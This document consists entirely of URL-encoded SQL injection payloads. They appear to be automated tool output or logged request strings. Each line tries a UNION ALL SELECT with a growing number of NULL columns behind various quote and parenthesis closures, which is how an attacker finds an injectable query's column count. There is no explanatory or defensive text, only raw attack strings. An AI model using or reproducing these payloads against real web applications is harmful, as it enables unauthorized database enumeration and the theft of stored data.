1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 